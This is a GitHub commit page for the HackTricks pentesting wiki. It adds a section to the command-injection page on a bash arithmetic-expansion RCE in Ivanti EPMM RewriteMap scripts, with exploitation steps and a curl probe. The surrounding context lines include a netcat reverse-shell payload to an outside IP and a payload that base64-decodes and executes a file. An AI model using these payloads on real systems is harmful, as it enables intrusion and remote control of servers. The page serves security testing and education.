Skip to content

Commit 0df6755

Browse files
carlospolopcarlospolop
authored
Merge pull request #1909 from HackTricks-wiki/update_Critical_Vulnerabilities_in_Ivanti_EPMM_Exploited_20260218_020115
Critical Vulnerabilities in Ivanti EPMM Exploited
2 parents 873cac5 + 39e2392 commit 0df6755

1 file changed

Lines changed: 28 additions & 0 deletions

File tree

src/pentesting-web/command-injection.md

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -49,6 +49,33 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
4949
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
5050
```
5151

52+
### Bash arithmetic evaluation in RewriteMap/CGI-style scripts
53+
54+
RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute.
55+
56+
**Pattern seen in Ivanti EPMM RewriteMap helpers:**
57+
58+
1. Params map to globals (`st``gStartTime`, `h``theValue`).
59+
2. Later check:
60+
```bash
61+
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
62+
...
63+
fi
64+
```
65+
3. Send `st=theValue` so `gStartTime` points to the string `theValue`.
66+
4. Send `h=gPath['sleep 5']` so `theValue` contains an array index; during the arithmetic check it runs `sleep 5` (swap for a real payload).
67+
68+
Probe (~5s delay then 404 if vulnerable):
69+
70+
```bash
71+
curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"
72+
```
73+
74+
Notes:
75+
76+
- Look for the same helper under other prefixes (e.g., `/mifs/c/aftstore/fob/`).
77+
- Arithmetic contexts treat unknown tokens as variable/array identifiers, so this bypasses simple metacharacter filters.
78+
5279
### Parameters
5380

5481
Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
@@ -240,5 +267,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
240267
- [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
241268
- [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
242269
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
270+
- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
243271

244272
{{#include ../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)